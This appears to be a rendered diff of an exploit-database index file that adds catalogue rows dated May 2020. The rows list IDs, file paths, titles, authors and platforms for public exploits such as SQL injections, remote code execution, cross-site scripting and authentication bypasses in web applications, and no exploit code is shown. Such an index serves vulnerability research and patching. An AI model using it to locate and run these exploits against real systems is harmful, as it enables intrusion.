44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42703,3 +42704,12 @@ id,file,description,date,author,type,platform,port
|
|||
48471,exploits/php/webapps/48471.txt,"E-Commerce System 1.0 - Unauthenticated Remote Code Execution",2020-05-14,SunCSR,webapps,php,
|
||||
48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php,
|
||||
48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java,
|
||||
48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware,
|
||||
48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php,
|
||||
48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,
|
||||
48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java,
|
||||
48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php,
|
||||
48479,exploits/php/webapps/48479.txt,"Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload",2020-05-18,"Kishan Lal Choudhary",webapps,php,
|
||||
48480,exploits/php/webapps/48480.txt,"online Chatting System 1.0 - 'id' SQL Injection",2020-05-18,BKpatron,webapps,php,
|
||||
48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php,
|
||||
48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue